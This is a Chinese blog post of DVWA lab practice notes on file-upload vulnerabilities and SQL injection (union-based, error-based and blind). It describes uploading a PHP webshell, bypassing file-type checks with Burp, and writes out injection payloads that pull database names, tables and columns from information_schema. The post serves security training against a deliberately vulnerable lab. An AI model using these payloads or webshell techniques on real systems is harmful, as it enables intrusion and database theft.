DVWA靶场练习4

file upload(文件上传)

low

文件上传漏洞,通常是由于对上传文件的类型,内容没有进行严格的过滤,检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache,Tomcat,Nginx等都是爆过文件上传漏洞。

查看源码发现对文件类型内容没有任何限制检查存在文件上传漏洞。

制作一句话木马,文件格式为php上传文件。使用蚁剑连接。进入后台。

 Mdeium

查看源码发现对文件类型限制应该为jepg或者为png

 编辑一句话木马为jpg格式上传,使用burp抓包将文件格式更改为php格式,成功后再用蚁剑连接

high

查看源码

发现需要上传图片木马

SQL injection(sql注入)

low

1、判断注入类型

输入1成功,输入1 and1=1 成功 输入1’失败

判断为数字型注入

 2、猜测sql查询语句的字段数

输入1’ order by 2#成功 输入1’ order by 3#失败,判断出字段数为2

 3、获取用户,数据库,版本号

输入1' union select 1,concat(user(),database(),version())#

4,获取数据库中的表

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

medium

1.提交后burp抓包,修改id=1改为1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #

在响应包查看

重复上面步骤

2.爆破表的数量: id=1 改为1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

3.爆破表的名字: id=1改为 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

 4.爆破users的字段名

id=1改为1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
 

high

查看源码

 

 使用了session 获取id 值,闭合方式单引号闭合

 

 

 SQL injection(sql注入盲注)

判断注入类型和sql注入一样

判断数据库的长度

输入1’ and length(database())=1 #,显示不存在;

输入1’ and length(database())=2 #,显示不存在;

输入1’ and length(database())=3 #,显示不存在;

输入1’ and length(database())=4 #,显示存在:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值